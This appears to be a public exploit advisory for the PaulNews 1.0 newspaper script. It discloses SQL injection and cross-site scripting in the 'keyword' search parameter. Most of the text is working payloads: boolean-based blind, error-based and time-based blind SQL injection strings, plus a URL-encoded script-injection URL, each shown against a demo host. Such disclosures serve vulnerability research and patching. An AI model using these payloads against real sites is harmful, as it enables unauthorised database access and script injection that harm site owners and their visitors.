# Exploit Title: PaulNews 1.0 - 'keyword' SQL Injection / Cross-Site Scripting # Dork: N/A # Date: 23.05.2018 # Exploit Author: Azkan Mustafa AkkuA (AkkuS) # Vendor: MediaSoft Pro # Vendor Homepage: https://codecanyon.net/item/paulnews-newspaper-and-magazine-script/19260686 # Version: v1.0 # Category: Webapps # Tested on: Kali linux # Description : The vulnerability allows an attacker to inject sql commands from the search section with 'keyword' parameter. You can use the GET or POST methods. ==================================================== # PoC : SQLi : http://test.com/news/search?keyword=[SQL] # Vulnerable Payload : Parameter: query (GET) Type : boolean-based blind Demo : http://test.com/news/search?keyword=test Payload: keyword=-3431') OR 6871=6871# Type : error-based Demo : http://test.com/news/search?keyword=test Payload: keyword=test') OR (SELECT 8996 FROM(SELECT COUNT(*),CONCAT(0x71626b6271,(SELECT (ELT(8996=8996,1))),0x71766b7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- IsdG Type : AND/OR time-based blind Demo : http://test.com/news/search?keyword=test Payload: keyword=test') OR SLEEP(5)-- OEdN ==================================================== # PoC : XSS : Payload : http://test.com/news/search?keyword=%27%20%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E%E2%80%98 ;